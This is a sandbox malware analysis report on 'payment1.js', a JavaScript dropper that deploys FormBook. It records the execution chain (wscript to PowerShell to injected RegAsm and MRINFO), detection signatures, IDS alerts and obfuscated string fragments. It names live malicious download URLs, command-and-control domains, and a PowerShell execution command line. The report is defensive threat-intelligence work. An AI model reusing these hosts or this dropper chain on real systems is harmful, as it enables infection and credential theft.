Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
payment1.js

Overview

General Information

Sample name:payment1.js
Analysis ID:1617730
MD5:2654bc864c7151909126b25ea1c81b76
SHA1:5ed041b8271952bdeb234412d57b08d62a2d76d5
SHA256:c7416d2226ba27764dc40ad2b8288e051f7f40f116f5995388a3a88e55c4006f
Tags:jsuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Potential obfuscated javascript found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6892 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 6944 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: FEC299680E47D0901C60D84DD11EFC55)
        • RegAsm.exe (PID: 6612 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 6920 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • sxkv2RIDKUVCF4X010eCnC.exe (PID: 4108 cmdline: "C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\tlGuABffGV7.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
            • MRINFO.EXE (PID: 5680 cmdline: "C:\Windows\SysWOW64\MRINFO.EXE" MD5: F664A3E4625D86FC6B389AFF416CF67F)
              • sxkv2RIDKUVCF4X010eCnC.exe (PID: 2924 cmdline: "C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\VhI7TkPM.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
              • firefox.exe (PID: 3568 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2989939402.0000000003060000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000B.00000002.2992102247.0000000005150000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.2104088509.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000A.00000002.2989897397.0000000003500000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.2106523345.0000000002A10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              5.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Script Initiated Connection to Non-Local Network
                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 196.251.92.64, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6892, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js", ProcessId: 6892, ProcessName: wscript.exe
                Sigma detected: Script Initiated Connection
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 196.251.92.64, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6892, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js", ProcessId: 6892, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6892, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 5352, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-18T08:15:08.251077+010020507451Malware Command and Control Activity Detected192.168.2.452381104.21.16.180TCP
                2025-02-18T08:15:31.565835+010020507451Malware Command and Control Activity Detected192.168.2.452532199.59.243.16080TCP
                2025-02-18T08:15:44.793153+010020507451Malware Command and Control Activity Detected192.168.2.45261913.248.169.4880TCP
                2025-02-18T08:15:58.061120+010020507451Malware Command and Control Activity Detected192.168.2.452659162.0.231.20380TCP
                2025-02-18T08:16:14.361639+010020507451Malware Command and Control Activity Detected192.168.2.45266313.248.169.4880TCP
                2025-02-18T08:16:29.221357+010020507451Malware Command and Control Activity Detected192.168.2.45266747.83.1.9080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-18T08:14:24.465469+010020188561A Network Trojan was detected196.251.92.6480192.168.2.449731TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-18T08:15:23.924194+010028554641A Network Trojan was detected192.168.2.452479199.59.243.16080TCP
                2025-02-18T08:15:26.471184+010028554641A Network Trojan was detected192.168.2.452495199.59.243.16080TCP
                2025-02-18T08:15:29.004663+010028554641A Network Trojan was detected192.168.2.452511199.59.243.16080TCP
                2025-02-18T08:15:37.053621+010028554641A Network Trojan was detected192.168.2.45256813.248.169.4880TCP
                2025-02-18T08:15:39.727711+010028554641A Network Trojan was detected192.168.2.45258413.248.169.4880TCP
                2025-02-18T08:15:42.257629+010028554641A Network Trojan was detected192.168.2.45260013.248.169.4880TCP
                2025-02-18T08:15:50.453083+010028554641A Network Trojan was detected192.168.2.452656162.0.231.20380TCP
                2025-02-18T08:15:52.974967+010028554641A Network Trojan was detected192.168.2.452657162.0.231.20380TCP
                2025-02-18T08:15:55.550608+010028554641A Network Trojan was detected192.168.2.452658162.0.231.20380TCP
                2025-02-18T08:16:03.677240+010028554641A Network Trojan was detected192.168.2.45266013.248.169.4880TCP
                2025-02-18T08:16:06.212902+010028554641A Network Trojan was detected192.168.2.45266113.248.169.4880TCP
                2025-02-18T08:16:08.776489+010028554641A Network Trojan was detected192.168.2.45266213.248.169.4880TCP
                2025-02-18T08:16:20.933176+010028554641A Network Trojan was detected192.168.2.45266447.83.1.9080TCP
                2025-02-18T08:16:24.058104+010028554641A Network Trojan was detected192.168.2.45266547.83.1.9080TCP
                2025-02-18T08:16:26.604887+010028554641A Network Trojan was detected192.168.2.45266647.83.1.9080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.weilaishijie.xyz/mvfs/Avira URL Cloud: Label: malware
                Source: http://www.weilaishijie.xyz/mvfs/?28t=_DlH9FNpJbu&JZfd=OX+XGG1vMjnBpir6rX0/G3mm6BKDnX5s9v0C7sC38KVwA5xuSoQxQAVtGC05vfCZlgARXwgyCJM/mKbUQVyNeO12dcoATF+wDwavyiCFDGb9TNEZS4YCLPo=Avira URL Cloud: Label: malware
                Source: http://www.infiniteve.xyz/rvdc/?JZfd=4SS44dSHix1qeqRpZ30sUGwaRLQ6PL636AaAeL4eRpehwv4hyktLqvMv9AyoVvbLe7Ilavn5wnoOWJ/fZmmrIfslJ8D6BKaSqIEkHtgn+Cj3tNriNM+Lp4c=&28t=_DlH9FNpJbuAvira URL Cloud: Label: malware
                Source: http://www.lucynoel6465.shop/9gtw/?JZfd=bFQVCxzo4meVUPRnP0n3FR5ZzBASsiXRVHB0uPlWJiDXwsbOt8zcfdxm4ktJdQTn5zPq+Y8ykDyEtSWLtIWRcrie4i7GHURObbczaEgRbEWCMNyWzbPKN50=&28t=_DlH9FNpJbuAvira URL Cloud: Label: phishing
                Source: http://www.dqvcbn.info/xqy6/Avira URL Cloud: Label: malware
                Source: http://www.dqvcbn.infoAvira URL Cloud: Label: malware
                Source: http://196.251.92.64/crypt/popo.ps1Avira URL Cloud: Label: malware
                Source: http://www.physicsbrain.xyz/ajxq/?JZfd=Z0yNDnK53JgtMSLt/Q+dSz0HWqwkNuop0AL5Lrb95TYezZcCk+GBjjC2rO5AP3na8OTPjj2cyURwNj0Uenp5Hjv5SXrtYK2BmGwEpYXvWphiXX161SqTvYw=&28t=_DlH9FNpJbuAvira URL Cloud: Label: malware
                Source: http://www.physicsbrain.xyz/ajxq/Avira URL Cloud: Label: malware
                Source: http://www.dqvcbn.info/xqy6/?JZfd=3AdOd/JiBJZfW59JF3bk/JUX+I6ir2eDUVeNMTHa5bokm3l1PR6gBk+gEKdbuXFpEa+iNwYC+tVHkUu9Fw3QKE4rVdEfXJGpPPZQf/r11XdvYWfnyknaUqI=&28t=_DlH9FNpJbuAvira URL Cloud: Label: malware
                Source: http://www.infiniteve.xyz/rvdc/Avira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Dropper.Gen
                Multi AV Scanner detection for submitted file
                Source: payment1.jsVirustotal: Detection: 16%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2989939402.0000000003060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2992102247.0000000005150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2104088509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2989897397.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2106523345.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2989992903.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2987628096.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2110867358.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000005.00000002.2107158636.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2990258811.00000000038EE000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2990258811.0000000003750000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2107338460.000000000359C000.00000004.00000020.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2104477664.00000000033E4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000005.00000002.2107158636.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, MRINFO.EXE, 0000000A.00000002.2990258811.00000000038EE000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2990258811.0000000003750000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2107338460.000000000359C000.00000004.00000020.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2104477664.00000000033E4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mrinfo.pdbGCTL source: RegAsm.exe, 00000005.00000002.2104818275.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2988989976.000000000096E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mrinfo.pdb source: RegAsm.exe, 00000005.00000002.2104818275.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2988989976.000000000096E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000000.2027775593.00000000003FF000.00000002.00000001.01000000.0000000A.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2987654360.00000000003FF000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\CZDFS.pdb source: powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp, x.exe.1.dr
                Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\CZDFS.pdbBSJB source: powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp, x.exe.1.dr
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0306CA70 FindFirstFileW,FindNextFileW,FindClose,10_2_0306CA70

                Software Vulnerabilities

                barindex
                JavaScript source code contains functionality to generate code involving a shell, file or stream
                Source: payment1.jsReturn value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsArgument value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
